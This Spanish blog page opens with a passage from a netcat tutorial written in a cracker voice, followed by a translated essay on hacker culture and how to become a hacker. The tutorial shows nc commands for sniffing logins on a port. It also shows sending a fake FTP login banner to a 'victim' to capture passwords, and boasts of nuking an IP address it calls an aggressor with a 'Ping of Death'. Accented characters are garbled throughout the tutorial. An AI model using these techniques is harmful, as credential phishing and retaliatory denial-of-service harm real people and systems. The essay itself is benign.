que es usada para scanning, los puertos se lo especificamos al final del
IP del host, bien sea individuales separados por un espacio; o por un
rango de puertos.


Sniffer:
========

Otra de las interesante posibilidades de netcat es su capacidad para
escuchar conecciones en cualquier puerto, pudiendo redireccionar todo el
tr?co del mismo hacia un archivo o hacia pantalla, en este sencillo
ejemplo, podemos observar las bases de un sencillo sniffer en Windows:

C:\nc11nt>nc -v -v -L 127.0.0.1 -p 23

DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 23 ...
DNS fwd/rev mismatch: localhost != darkstar
connect to [127.0.0.1] from localhost [127.0.0.1] 1131
login: sniffado
password: jeje!!
puedo ver todo lo que escriben aqui... Muuuaaahahahahahah!!! B-]


Tambien podemos redireccionar toda la salida a un archivo e
irnos a realizar otras actividades ,ientras netcat hace su trabajo:

C:\nc11nt>nc -v -v -L -p 23 127.0.0.1 -t >login.txt
DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 23 ...

[Aqui viene la conneci??.]

DNS fwd/rev mismatch: localhost != darkstar
connect to [127.0.0.1] from localhost [127.0.0.1] 1030

[Todo lo que escriba la connecci??e va al archivo login.txt]
sent 0, rcvd 42

[La opci??L permite que netcat escuche nuevamente al terminar la conecci??
"New Victims Wanted" Hehe!]

DNS fwd/rev mismatch: localhost != darkstar
listening on [127.0.0.1] 23 ...




El Exploit-Explained: nc -v -v -L 127.0.0.1 -p 23
---------------------

Ejecutamos a Netcat con la opci?? variable -v (verbose)
(doblemente "verbose" por si acaso)  esto har?ue el resultado de
netcat, sea mostrado directamente en pantalla (a diferencia del archivo
usado por Dr._X) , la opci?? variable -L (Listen, and listen again)
nos permitir?ejar escuchando u "oliendo" en determinado puerto aun
cuando la conecci??ea interrumpida (listen again), con la variable -p
le indicamos el puerto...

Al ejecutar a netcat con esa combinaci??e variables las
opci??v me indica en pantalla el Host y el puerto de escucha:

DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 23 ...


Realizo desde otra ventana un telnet a localhost (127.0.0.1) en
el puerto 23, netcat me informa sobre lo que ocurre en el puerto 23:

DNS fwd/rev mismatch: localhost != darkstar
connect to [127.0.0.1] from localhost [127.0.0.1] 1131
login: sniffado


Voil?un Sniffer en LocalHost! Jajaja!!!



Detector de Conneciones Sospechosas:
====================================

La posibilidad de dejar a netcat escuchando en determinados puertos,
nos permite crear una especie de "trampa" para un supuesto agresor que utilize
scanners, o herramientas tales como NetBus o BackOrifice en contra de
nuestras estaciones. Incluso, podemos crear un archivo que haga un Flood
y redireccionar su salida hacia la estaci??gresora en caso de una conecci??br />no autorizada a determinado puerto. (jeje! y se me ocurren un monton de cosas
m? Muaahahaha!)

Este es un ejemplo de un detector de BO, Je! y funciona! este es un ejemplo
real de un dia como cualquier otro en IRC; he aqu?l ejemplo:

C:\nc11nt>nc -u -v -v -L -p 31337 127.0.0.1 31337
DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 31337 ...

invalid connection to [0.0.0.0] from nas1-064.ras.bqm.cantv.net
[161.196.246.65]
31338

Back Orifice utiliza el protocolo UDP para realizar sus
travesuras, realiza la conecci??esde un puerto aleatorio (casi siempre
el 1080) aunque en este caso lo hizo desde el 31338 (posiblemente una
variante de BO), por eso se utiliza la opci??u (protocolo udp) ,
netcat se queda esperando conecciones UDP en el puerto 31337 (default de
BO) , cuando alguien hace un sweep a tu IP netcat lo detecta enviando a
pantalla el IP y el DNS del agresor...

Luego un peque??quot;Ping of Death" (Nuke) para el transgresor y
le hacen un Scan para ver cuando desaparece B-]

nas1-064.ras.bqm.cantv.net [161.196.246.65] 48 (?): connection refused
nas1-064.ras.bqm.cantv.net [161.196.246.65] 47 (?): connection refused
nas1-064.ras.bqm.cantv.net [161.196.246.65] 46 (?): connection refused
nas1-064.ras.bqm.cantv.net [161.196.246.65] 45 (?): TIMEDOUT
nas1-064.ras.bqm.cantv.net [161.196.246.65] 44 (?): TIMEDOUT<--Chao!!! Jeje!!


Otros usos Miscelaneos:
=======================

Puedes utilizar algo de ingiener?social para capturar algunos
passwords con netcat, por ejemplo, si una m?ina no tiene abierto el
puerto de FTP o de telnet, creas un archivo de texto que solicite el ID
y el Password de la v?ima; algo as?

Microsoft Internet FTP Server V.5.9 [Beta]
04/16/99 myhost.com
Please introduce Username, password and press "Enter"
LogOn:

Luego redireccionas el archivo hacia la victima:

C:\nc11nt>nc -v -v -L -p 21 nombre del host -t < login.txt

Si el tonto cae... Ah?a tu password, Jeje!! B-] un poco de
imaginaci?? ma??e permitir?encontrar muchas utilidades para
netcat.


Netcat en Vez de Telnet.
=======================

Yo personalmente prefiero usar netcat para realizar connecciones
remotas como alternativa al Telnet. la ventaja de realizar conecciones telnet
desde netcat es que este esconde "algo" sobre tu conecci??lo que lo hace
mas "sigiloso" que telnet, (de ah?or que lo llamaron netcat), Realizando
una conecci??quot;Limpia" en determinado puerto, obviando las negociaciones
comunes de Telnet que pueden confundir al cliente en determinados casos,
como por ejemplo, al utilizar ciertas Backdoors muy conocidas en Unix.

OJO: algunas m?inas interpretan al cliente de telnet
y asumen el nombre del usuario que lo utiliza, de all?l porqu?lgunos
servidores solo preguntan por password ; teoricamente netcat no envia
esta informaci??Por eso, es recomendable acostumbrarse a utilizar netcat
para hacer conecciones remotas:


c:> nc -v nombre del host 23(o el puerto de tu preferencia)


Netcat y Programaci??
======================

Esta combinaci??esencadena todo el Poder de Netcat en su m?ma
expresi??Tratandose de una herramienta que funciona con lineas de comandos,
su integraci??on un lenguaje de programaci??e permite realizar gran
cantidad de tareas, y posibilidades se van descubriendo dia a dia con su
inclusi??n nuevos Scripts y Exploits.

Muchos ScriptKiddies que no tienen idea de lo que hacen, se sienten
frustrados porque muchos de los Scripts y Exploits que bajan de la Red
simplemente no les funciona, porque no saben interpretar el C??o y por
lo tanto son incapaces de efectuar las modificaciones necesarias para incluir
librerias, paths o utilidades necesarias para su funcionamiento.
(J??se ScriptKiddies!!! Jajaja!!)

Netcat es exelente para implementar exploits remotos, permitiendo
enviar el c??o a cualquier puerto vulnerable con una simple orden, logrando
ejecutar todos los comandos necesarios para explotar determinados servicios.

Varios exploits que circulan actualmente en la Red, usan a netcat
como "motor" para manejar las conecciones, si analizamos el c??o de estos
programas podemos observar un nc por ah?esto significa que el Proggie en
cuesti??ecesita una versi??orrectamente compilada de netcat en el
directorio /usr/bin

Si marco la fuente puede que os lo tomeis como SPAM, porque no creo que os guste el origen de este tutorial...
Bueno igualmente espero que os haya sido de utilidad
bueno
Salu2

sábado, 26 de noviembre de 2011

Cómo convertirse en hacker

¿Qué es un hacker?
El Jargon File contiene un montón de definiciones del termino "hacker", la mayoría basadas en la afición a lo técnico y en el placer de resolver problemas sobrepasando los límites. Si deseas saber cómo convertirte en un hacker, bien, solo 2 puntos son realmente relevantes.
Existe una comunidad, una cultura compartida, de programadores expertos y magos de las redes, cuya historia se remonta décadas atrás a los tiempos de los primeros miniordenadores de tiempo compartido y los tempranos experimentos con ARPAnet. Los miembros de esta cultura crearon el término "hacker". Los hackers construyeron Internet. Los hackers hicieron de Unix el sistema operativo que es hoy día. Los hackers hacen andar Usenet. Los hackers hacen funcionar la WWW. Si eres parte de esta cultura, si has contribuido a ella y otras personas saben quién eres y te llaman hacker, entonces eres un hacker.
Los mentalidad hacker no está confinada a esta cultura del software. Hay gente que aplica la actitud de hacker a otras cosas, como la electrónica o la música —de hecho, puedes encontrarla en los más altos niveles de cualquier ciencia o arte. Los hackers de software reconocen estos espíritus emparentados en otras partes y pueden llamarlos "hackers" también— y algunos sostienen que la naturaleza hacker es en realidad independiente del medio particular en el cual el hacker trabaja. Sin embargo, en el resto de este documento nos centraremos en las habilidades y actitudes de los hackers de software, y en las tradiciones de la cultura compartida que originó el término "hacker".
Existe otro grupo de personas que se llaman a sí mismos hackers, pero que no lo son. Son personas (generalmente varones adolescentes) que se divierten irrumpiendo ilegalmente en ordenadores y haciendo "phreaking" en el sistema teléfonico. Los auténticos hackers tienen un nombre para esas personas: "crackers", y no quieren saber nada de ellos. Los auténticos hackers opinan que la mayoría de los crackers son perezosos, irresponsables y no muy brillantes, y fundamentan su crítica en que ser capaz de romper la seguridad no le hace a uno un hacker, de la misma manera que ser capaz de arrancar un coche con un puente en la llave no le convierte en ingeniero de automotores. Desafortunadamente, muchos periodistas y escritores utilizan erróneamente la palabra "hacker" para describir a los crackers; esto causa enorme irritación a los auténticos hackers.
La diferencia básica es esta: los hackers construyen cosas; los crackers las destruyen.
Si quieres ser un hacker, continúa leyendo. Si lo que quieres es ser un cracker, ve directo a leer el alt.2600 y prepárate para soportar la dura realidad cuando descubras que no eres tan listo como crees. Y eso es todo lo que voy a decir de los crackers.
La actitud del hacker
Los hackers resuelven problemas y construyen cosas, y creen en la libertad y la ayuda voluntaria mutua. Para ser aceptado como hacker, deberás comportarte como si tuvieras esta actitud en tu interior. Y para comportarte como si tuvieras esta actitud, deberás creerte de verdad dicha actitud.
Pero si piensas en cultivar las actitudes de hacker solo como una forma de ganar aceptación en esta cultura, te estás equivocando. Transformarse en la clase de persona que cree estas cosas es importante para ti —para ayudarte a aprender y mantenerte motivado. Como en todas las artes creativas, el modo más efectivo de transformarse en un maestro es imitar la mentalidad de los maestros —no sólo intelectualmente, sino también emocionalmente.
O como dice el siguiente poema zen moderno:
Para seguir la trayectoria:
mira al maestro,
sigue al maestro,
camina junto con el maestro,
mira a través del maestro,
conviértete en el maestro.
Así que, si quieres ser un hacker, repite lo que sigue hasta que te creas lo que estás diciendo:
1. El mundo está lleno de problemas fascinantes que esperan ser resueltos
Es muy divertido ser un hacker, pero es la clase de diversión que requiere mucho esfuerzo. El esfuerzo requiere motivación. Los atletas triunfadores obtienen su motivación a partir de un tipo de placer físico que surge de trabajar su cuerpo, al forzarse a sí mismos más allá de sus propios límites físicos. De manera similar, para ser un hacker deberás sentir un estremecimiento de tipo primitivo cuando resuelves problemas, afinas tus habilidades y ejercitas tu inteligencia.
Si no eres la clase de persona que te sientes inclinado hacia estas cosas de forma natural, necesitarás poder experimentarlas para llegar a ser un hacker. De no ser así, encontrarás que tu energía para "hackear" se verá agotada por otras distracciones como el sexo, el dinero o la aprobación social.
(Además deberás desarrollar cierta clase de fe en tu propia capacidad de aprendizaje —la creencia de que, aun cuando puedes no saber todo lo que necesitas para resolver un problema, si tomas una parte de él y aprendes desde allí, aprenderás lo suficiente para resolver la siguiente parte, y así, hasta que lo tengas resuelto por completo.)
2. Ningún problema tendría que resolverse dos veces
Los cerebros creativos son un recurso valioso y limitado. No deben desperdiciarse reinventando la rueda cuando hay tantos y tan fascinantes problemas nuevos esperando por allí.
Para comportarte como un hacker, debes creer que el tiempo para pensar que emplean otros hackers es precioso —tanto, que es casi una obligación moral para ti el compartir la información, resolver los problemas y luego exponer la solución de manera que los otros hackers puedan resolver nuevos problemas, en lugar de enfrentarse perpetuamente con los viejos.
(No tienes que pensar que estás obligado a regalar todo tu producto creativo, aunque aquellos hackers que lo hacen son los que obtienen más respeto por parte de los demás hackers. Es consistente con los valores de un hacker venderse lo suficiente para pagar la comida, el alquiler y los ordenadores. También está bien la utilización de estas habilidades de hacker para sostener a la familia, o incluso hacerse rico, siempre que no olvides la lealtad a tu arte y a tus colegas hackers mientras lo haces.)
3. El aburrimiento y el trabajo rutinario son perniciosos
Los hackers (y las personas creativas en general) nunca debieran ser sometidas a trabajos estupidamente repetitivos, porque cuando esto sucede significa que no están haciendo lo único que son capaces de hacer: resolver nuevos problemas. Este desperdicio de talento daña a todo el mundo. Por ello, las tareas rutinarias, repetitivas y aburridas no sólo son desagradables, sino intrínsecamente perversas.
Para comportarte como un hacker, debes creer en esto lo suficiente como para automatizar las tareas rutinarias todo lo que se pueda, no solamente por ti mismo, sino para beneficio de todos los demás (especialmente otros hackers).
(Existe una aparente excepción a esta regla. Los hackers hacen cosas a veces que pueden parecer repetitivas o aburridas a un observador, pero son un ejercicio para lograr claridad mental o para adquirir cierta habilidad u obtener cierta clase de experiencia que no podría conseguirse de otro modo. Pero esto es una elección —ningún ser pensante debiera nunca ser forzado a una situación que les aburra.)
4. La libertad es buena
Los hackers son antiautoritarios por naturaleza. Cualquiera que pueda darte órdenes, puede obligarte a dejar de resolver ese problema que te está fascinando —y, dada la manera como trabajan las mentes autoritarias, encontrarán alguna razón espantosamente estúpida para hacerlo. Por eso, la actitud autoritaria debe ser combatida donde sea que se la encuentre, pues si se la deja te asfixiará, tanto a ti como a otros hackers.
(Esto no es lo mismo que combatir toda autoridad. Los niños necesitan guía, y los criminales, restricciones. Un hacker puede estar de acuerdo en aceptar algún tipo de autoridad para poder obtener algo que desea más que el tiempo que gasta en seguir órdenes. Pero este es un pacto limitado, consciente; la clase de sumisión que desean los autoritarios no está en oferta.)
Los autoritarios prosperan en la censura y el secreto. Y desconfían de la cooperación voluntaria y del intercambio de información —sólo les agrada la cooperación que tienen bajo su control. Así que, para comportarte como un hacker, deberás desarrollar una hostilidad instintiva hacia la censura, el secreto y la utilización de la fuerza o el fraude para someter a adultos responsables. Y deberás estar preparado para actuar en consencuencia.
5. La actitud no es sustituto para la competencia
Para ser un hacker, deberás desarrollar algunas de esas actitudes. Pero tener solo la actitud no te transformará en hacker, como tampoco te puede transformar en un atleta campeón o en estrella del rock. Para transformarte en hacker necesitarás inteligencia, práctica, dedicación y trabajo duro.
Por lo tanto, debes aprender a desconfiar de la actitud y respetar la competencia en todas sus formas. A ningún hacker le gusta perder el tiempo con quienes adoptan la pose de hacker, sino que veneran la competencia —especialmente la competencia al hackear, pero la competencia en cualquier ámbito está bien. Especialmente buena es la competencia en habilidades exigentes que poca gente domina, y la mejor es la competencia en habilidades exigentes que requieren agudeza mental, destreza y concentración.
Si respetas la competencia, disfrutarás desarrollándola en ti mismo —el trabajo duro y la dedicación se transformarán en una especie de juego intenso, y no una rutina. Esa actitud es vital para transformarse en hacker.
Habilidades básicas para el hacking
La actitud hacker es vital, pero más aún lo son las habilidades. La actitud no es sustituto para la competencia, y existe un cierto conjunto de herramientas básicas que debes dominar antes que cualquier hacker sueñe con llamarse así.
Este conjunto de herramientas cambia lentamente a lo largo del tiempo a medida que la tecnología crea nuevas habilidades y descarta otras por obsoletas. Por ejemplo, se incluía la programación en lenguaje máquina, y no se hablaba de HTML hasta hace poco. Pero hacia finales de 1996, está claro que se debe incluir lo siguiente:
1. Aprende a programar
Esta es, por supuesto, la habilidad fundamental del hacker. Si no conoces ningún lenguaje de programacion, recomiendo empezar con Python. Es limpio, bien documentado, y relativamente fácil para novatos. A pesar de ser un buen primer lenguaje, no es un juguete; es muy poderoso, flexible y se adapta bien a grandes proyectos. He escrito un detallado análisis de Python. Hay disponibles buenos tutoriales en el sitio web de Python.
Java es tambien un buen lenguaje para iniciarse en la programación. Es más difícil que Python, pero produce código más rápido que Python. Creo que es un buen segundo lenguaje para aprender.
Pero no creas que podrás ser un hacker, siquiera un programador, si solo conoces un único lenguaje —debes aprender cómo pensar en los problemas de programación de una manera general, independiente de cualquier lenguaje. Para ser un hacker de verdad, precisas llegar al punto en el cual aprendas un lenguaje nuevo en días, relacionando lo que está en el manual con lo que ya sabe de antes. Esto significa que debes aprender varios lenguajes muy diferentes entre sí.
Si deseas meterte seriamente en programación, tendrás que aprender C, la base de Unix. C++ es muy parecido a C; si conoces uno, aprender el otro no te resultará difícil. Sin embargo, ninguno de ellos es bueno para aprender a programar. Y hoy día, cuanto más puedas evitar programar en C, mas productivo serás.
C es muy eficiente, y trabaja bien con los recursos de las maquinas. Desafortunadamente, C obtiene su eficiencia a base de mucho manejo a bajo nivel de los recursos (como la memoria) a mano. Todo esa programación a bajo nivel es muy compleja y propensa a errores, y tendrás que dedicar gran cantidad de tiempo a la depuración de los programas. Con las máquinas de hoy, tan poderosas, esto ya no es tan necesario —es más inteligente usar un lenguaje que use el tiempo de máquina menos eficientemente, pero en cambio use tu tiempo más eficientemente. O sea, Python.
Otros lenguajes de particular importancia para los hackers son Perl y LISP. Perl vale la pena aprenderlo por razones prácticas: es amplísimamente usado por páginas web dinámicas y por sistemas de administración, así que incluso si nunca has escrito en Perl, deberías aprender a leerlo. Mucha gente usa Perl en la forma que yo sugiero usar Python, para evitar la programacion en C en trabajos que no requieran la eficiencia de C. Necesitarás ser capaz de entenderlo.
Vale la pena aprender LISP por una razón diferente — La profunda e iluminadora experiencia que obtendrás cuando finalmente lo logres te hará ser mejor programador el resto de tus días, incluso si no usas LISP mucho. (Puedes obtener fácilmente algo de primera experiencia con LISP escribiendo y modificando los modos de edición del editor Emacs.)
Lo mejor hoy día es aprender estos cinco (Python, Java, C/C++, Perl y LISP). Además de ser estos lenguajes los mas importantes en el hacking, representan muy diversas formas de aproximarse a la programación, y cada uno te educará de diferentes maneras.
No puedo dar instrucciones completas en este documento de cómo puedes aprender a programar —es una habilidad compleja. Pero puedo adelantarte que los libros y los cursos no servirán (muchos, tal vez la mayoría de los mejores hackers, son autodidactas). Puedes aprender las características de los lenguajes —partes de conocimiento— de libros, pero el verdadero conocimiento lo adquieres en la vida real aplicando lo que ya sabes. Lo que sí servirá es a) leer código y b) escribir código.
El aprendizaje de la programación es como aprender a escribir bien en lenguaje natural. La mejor manera de aprender es leer algo de las cosas escritas por los maestros del estilo, luego escribir algunas cosas tú mismo, leer mucho más, escribir un poco más... y repetir esto hasta que lo que escribes empieza a mostrar la clase de fuerza y economía que aprecias en tus modelos.
Antes era difícil encontrar código de buena calidad para leer, porque había pocos programas de cierta magnitud disponibles en código fuente de tal manera que los hackers noveles pudieran meterles mano. Esta situación ha cambiado drásticamente: software de fuente abierta, herramientas de programación libres y sistemas operativos libres (todo ello hecho por hackers) están ampliamente disponibles en la actualidad. Lo que me lleva elegantemente a nuestro siguiente tema...
2. Consigue uno de los Unices libres; aprende a usarlo y a ponerlo en funcionamiento
Asumo que tienes un ordenador personal o puedes acceder a uno (a estos muchachos de hoy día les resulta tan sencillo obtenerlo... :-)). El paso con mucho más importante que cualquier novato puede dar en el camino de adquirir las habilidades de un hacker es obtener una copia de Linux o alguno de los otros Unices tipo BSD libres, instalarlo en una máquina personal y hacerlo funcionar.
Sí, es cierto que existen otros sistemas operativos en el mundo además de Unix. Pero sólo pueden encontrarse en formato binario —no puedes ni leer el código ni modificarlo—. Si intentas aprender a hackear en una máquina DOS, Windows o en un MacOS te sentirás como si tratas de aprender a bailar con el cuerpo escayolado.
Bajo OS/X es posible, pero solo una parte del del sistema es código de fuente abierta —Es como si estuvieras golpeando un muro de varias capas de cemento, y aparte tienes que ser cuidadoso para no desarrollar el mal hábito de depender del código propietario de Apple. Si te concentras en Unix bajo el capó, puedes aprender cosas mas útiles.
Unix es el sistema operativo de Internet. Si bien puedes aprender a usar Internet sin saber Unix, nunca podrás ser un hacker en Internet sin conocerlo. Por este motivo, la cultura hacker actual está muy centrada en Unix. (Esto no fue siempre así, e incluso la situación le desagrada a algunos de los hackers más veteranos, pero la simbiosis entre Unix e Internet es tan fuerte que hasta la energía de Microsoft parece incapaz de hacerle mella.)
Así que consigue un Unix —personalmente me gusta Linux, pero hay otros (y sí, puedes hacer funcionar Linux y DOS/Windows en la misma máquina). Apréndelo. Hazlo funcionar. Métele mano, anímate. Comunícate en Internet mediante él. Lee el código. Modifícalo. En ese sistema se incluyen las mejores herramientas de programación (que incluyen C, Lisp y Perl) de lo que cualquier sistema operativo de Microsoft ni siquiera podría soñar, además te divertirás y te sumergirás en un caudal de conocimientos de tal magnitud que nunca hubieras imaginado, hasta que en cierto momento, mirando hacia atrás, te darás cuenta que ya eres un maestro hacker consumado.
Si quieres saber más acerca del aprendizaje de Unix, ve a The Loginataka.
Si quieres meter tus manos en Linux, echa un ojo en Dónde puedo obtener Linux.
Puedes encontrar ayuda y recursos de BSD Unix en http://www.bsd.org/.
He escrito sobre los fundamentos básicos de Unix y de Internet.
(Nota: No recomiendo instalar ni Linux ni BSD a solas si eres novato. Para Linux, encuentra un grupo de usuarios local de Linux y pide ayuda; o contáctalo mediante Open Projects Network. LISC mantiene canales IRC donde puedes obtener ayuda.)
3. Aprende a usar la Web y a programar en HTML
La mayoría de las cosas que ha construido la cultura hacker funcionan fuera de la vista del gran público, ayudando en el funcionamiento de fábricas, oficinas y universidades, y carecen de un impacto obvio en la vida de quienes no son hackers. La Web es la única gran excepción, y es tan enorme y brillante este juguete de hackers que incluso los políticos admiten que está cambiando el mundo. Sólo por esta razón (y hay un montón de otras igualmente buenas), debes aprender a trabajar en la Web.
No me estoy refiriendo a aprender a manejar un navegador (cualquiera puede hacer eso), sino que debes aprender a escribir HTML, el lenguaje de marcas de la Web. Si aún no sabes cómo programar, el aprendizaje que implica la escritura de HTML te enseñará algunos de los hábitos mentales que te ayudarán luego con la programación. Así que hazte una página personal. Prueba con XHTML, que es más claro que el clasico HTML. (Existen buenos tutoriales para principiantes en la Web; aquí hay uno.)
Pero no vayas a creer que por tener una página personal estás más cerca de ser un hacker. La Web está llena de páginas personales. La mayoría de ellas son banales, basura sin contenido —basura muy vistosa, pero basura al fin (si deseas saber más sobre este tema, mira en The HTML Hell Page).
Para que valga la pena, tu página debe tener contenido —debe ser interesante y/o útil para los otros hackers. Y esto nos lleva al próximo tema...
4. Si no tienes un inglés funcional, apréndelo
Como estadounidense y hablante nativo de inglés, era reacio a sugerir esto, por si se interpretaba como una suerte de imperialismo cultural. Pero hablantes nativos de otras lenguas me han urgido a que señale que el inglés es el lenguaje con el que trabaja la cultura hacker e Internet, y necesitarás saberlo para funcionar en la comunidad hacker.
Esto es muy cierto. Tiempo atrás, alrededor de 1991, aprendí que muchos hackers que tenían el inglés como segundo idioma lo usaban en discusiones técnicas, incluso cuando compartían su lengua natal; me comentaron que el inglés tiene un vocabulario técnico más rico que cualquier otra lengua y sencillamente por esto era mejor herramienta para el trabajo. Por razones similares, las traducciones de libros técnicos escritos originalmente en inglés son con frecuencia insatisfactorias (si es que se hacen).
Linus Torvalds, un finlandés, comenta su codigo en inglés (al parecer nunca se le ocurrió hacerlo de otra manera). Su fluidez con el inglés ha sido un importante factor en su habilidad para reclutar una comunidad mundial de desarrolladores de Linux. Y esto nos lleva al próximo tema...
Estatus en la cultura hacker
De manera similar a muchas otras culturas sin economía monetaria, el hackerismo se basa en la reputación. Estás intentando resolver problemas interesantes, pero cuan interesantes y buenas son las soluciones que encuentres es algo que sólo tus iguales o superiores técnicamente hablando serán capaces de juzgar.
De acuerdo a esto, cuando juegas el juego del hacker, aprendes a puntuarte principalmente en función de lo que los otros hackers piensan acerca de tus habilidades (este es el motivo por el cual no puedes ser un hacker de verdad hasta que otros hackers te denominen así de manera consistente). Este hecho está empañado por la imagen del hacking como trabajo solitario; también por un tabú cultural hacker (que ahora está decayendo, pero aún es fuerte) que impide que se admita el ego o la validación externa como elementos involucrados en la propia motivación.
Específicamente, el hackerismo es lo que los antropólogos denominan una cultura del don. Adquieres estatus y reputación no mediante la dominación de las otras personas, ni por ser hermoso/a, ni por tener cosas que las otras personas desean, sino por donar cosas. Específicamente, al donar tu tiempo, tu creatividad, y el resultado de tu destreza.
Existen básicamente cinco clases de cosas que puedes hacer para obtener el respeto de los hackers:
1. Escribir software de fuente abierta
Lo primero (lo más central y más tradicional) es escribir programas que los otros hackers opinen que son divertidos o útiles, y donar los fuentes del programa a la cultura hacker para que sean utilizados.
(Solíamos llamarlo free software pero esto confundía a demasiada gente, que no estaban seguros de qué se suponía que significaba free [en inglés, el término free es polisémico y puede significar "libre" o "gratis". En castellano no se da tal ambigüedad por lo que la expresión "software libre" resulta perfectamente adecuada — N. del T.]. La mayoría de nosotros, al menos un ratio 2:1 de acuerdo con los análisis del contenido de la web, ahora preferimos el término software "open source" [En castellano, sin embargo, se sigue usando habitualmente "software libre", aunque en esta versión hemos respetado, como es natural, el cambio en la terminología de Eric, que ha sustituido " free software" por open source en todos sus documentos, y lo hemos traducido por "código de fuente abierta" — N. del T.]).
Los más reverenciados semidioses del hackerismo son las personas que han escrito programas de gran magnitud, con grandes capacidades que satisfacen necesidades de largo alcance, y los donan, de tal manera que cualquiera pueda utilizarlos.
2. Ayudar a probar y depurar software de fuente abierta
También son reconocidas aquellas personas que depuran los errores del software de fuente abierta. En este mundo imperfecto, inevitablemente pasaremos la mayoría de nuestro tiempo de desarrollo en la fase de depuración. Este es el motivo por el cual los desarrolladores de software de fuente abierta piensan que un buen "beta-tester" (probador de versiones beta, alguien que sabe cómo describir claramente los síntomas, que puede localizar correctamente los problemas, que tolera los errores en una entrega apurada, y que está dispuesto a aplicar unas cuantas rutinas sencillas de diagnóstico) vale su peso en oro. Aun contando con un solo probador de estos, puede hacerse que el proceso de depuración pase de ser una prolongada pesadilla que lo deja a uno exhausto a ser sólo una saludable molestia.
Si eres novato, trata de encontrar un programa en desarrollo en el cual estés interesado, y conviértete en un buen probador beta. Hay una progresión natural desde ayudar a probar programas, luego ayudar a depurarlos y más adelante ayudar a modificarlos. Aprenderás un montón de esa manera, y la gente te ayudará en el futuro.
3. Publicar informacion útil
Otra buena cosa que puedes hacer es recopilar y filtrar información útil e interesante y construir páginas web o documentos tipo FAQ ("Preguntas Frecuentes"), y ponerlos a disposición de los demás.
La gente que mantiene las FAQ técnicas más importantes gozan de casi tanto respeto como los autores de software libre.
4. Ayudar a mantener en funcionamiento la infraestructura
La cultura hacker (y el desarrollo ingenieril de Internet, para el caso) funciona gracias al trabajo voluntario. Existe una gran cantidad de trabajo necesario pero sin glamour que debe hacerse para que esto siga marchando —administrar listas de correo, moderar foros de discusión, mantener sitios donde se archivan grandes cantidades de software, desarrollar RFCs y otros estándares técnicos.
La gente que desarrolla estas actividades goza de mucho respeto, porque todos saben que esos trabajos son grandes consumidores de tiempo y no tan divertidos como meterse con el código. Al hacerlos demuestran su dedicación.
5. Hacer algo por la cultura hacker en sí misma
Finalmente, puedes propagar la cultura hacker en sí misma (por ejemplo, escribiendo un texto acerca de cómo transformarse en hacker :-)). Esto es algo que no estarás en disposición de hacer hasta que seas bien conocido en el ambiente por alguna de las cuatro cosas recién descritas.
La cultura hacker no tiene líderes exactamente, pero tiene héroes culturales, ancianos de la tribu, historiadores y portavoces. Cuando hayas estado en las trincheras tiempo suficiente, podrás crecer y transformarte en uno de ellos. Pero ten cuidado: los hackers desconfían del ego ruidoso en sus jefes tribales, así que la búsqueda visible de esa clase de fama es peligrosa. En lugar de esforzarte en ello, es mejor colocarse en una posición tal que ella caiga sobre ti, y luego debes comportarte de manera modesta y con gracia con tu estatus.
La conexión hacker/nerd
Contrariamente al mito popular, no tienes que ser un nerd [literalmente "empollón", pero en la jerga hacker se ha asumido de forma irónica, perdiendo el matiz originalmente despectivo, y ha acabado usándose como sinónimo de alguien que se preocupa por las cosas importantes y no se entretiene en trivialidades. — N. del T.] para ser hacker. Ayuda, sin embargo, y muchos hackers son nerds. Al ser un marginado social, el nerd puede mantenerse concentrado en las cosas realmente importantes, como pensar y hackear.
Por esta razón, muchos hackers han adoptado la etiqueta "nerd" e incluso utilizan el desagradable término geek como insignia de orgullo —es su forma de declarar su propia independencia de las expectativas sociales normales.
Si puedes concentrarte lo suficiente en el hacking para ser bueno en ello, y encima disfrutar de vida personal, está bien. Es muchísimo más fácil ahora que cuando yo era un novato en los años setenta; la cultura dominante ve con mejores ojos a los tecno-nerds en la actualidad. Hay además un número creciente de personas que se dan cuenta de que con frecuencia los hackers son un material de alta calidad para novio/novia/marido/esposa.
Si te siente atraído por la actividad hacker porque no tienes vida propia, está bien también —al menos no tendrá problemas de concentración—. A lo mejor más adelante puedes conseguir una vida propia como el resto de la gente.
Cuestiones de estilo
De nuevo, para ser un hacker, debes desarrollar la mentalidad del hacker. Existen algunas cosas que puedes hacer cuando estás sin ordenador, que pueden ayudarte. Estas cosas no son sustituto para la actividad propia de hackear (nada lo es) pero muchos hackers las realizan, y sienten que de alguna manera primitiva se conectan con la esencia de la actividad de hackear.
  • Aprende a escribir correctamente en tu lengua. A pesar de que existe el estereotipo de que los programadores no son capaces de escribir, una cantidad sorprendente de hackers (incluyendo a los mejores que conozco), son escritores competentes.
  • Lee ciencia-ficción. Ve a las reuniones sobre ciencia-ficción (es un buen método para conocer hackers y proto-hackers).
  • Estudia zen, y/o practica artes marciales. (La disciplina mental se parece en ambos casos.)
  • Desarrolla un oído analítico para la música. Aprende a apreciar clases peculiares de música. Aprenda a tocar correctamente algún instrumento musical, o a cantar.
  • Desarrolla inclinación por los dobles sentidos y los juegos de palabras.
Cuantas más cosas de estas hayas hecho, es más probable que poseas material natural para hacker. Por qué estas cosas en particular y no otras es algo que no está completamente claro, pero todas están conectadas con un mezcla de tu parte izquierda y derecha de las habilidades de tu cerebro, lo que parece ser una cosa importante; los hackers ser capaces tanto de razonamiento lógico como de dar pasos al margen de lógica aparente de un problema en un momento dado.
Trabaja tan intensamente como juegas y juega tan intensamente como trabajas. Para los verdaderos hackers, la diferiencia entre "juego", "trabajo", "ciencia" y "arte" tienden a desaparecer, o mezclarse en un alto nivel de creatividad. Además, no te des por satisfecho con tener un estrecho rango de habilidades. Aunque la mayoría de los hackers se autodescriben como programadores, suelen ser más que competentes en actividades diversas —administración de sistemas, diseño web y arreglar problemas de hardware son algo común—. Un hacker que, por un lado, es administrador de sistemas, por el otro es también habilidoso en programación de scripts y diseño de webs. Los hackers no hacen las cosas a medias; si se meten de lleno en un tema, tienden a ser muy buenos en él.
Finalmente, unas cuantas cosas que no debes hacer:
  • No uses un nombre de usuario tonto o grandioso.
  • No te metas en "flamewars" (discusiones airadas) en Usenet (ni en ningún otro lado).
  • No te llames a ti mismo "ciberpunk", y no pierdas tu tiempo con nadie que lo haga.
  • No publiques en los foros ni escribas correos con montones de errores de tecleo o construcciones gramaticales incorrectas.
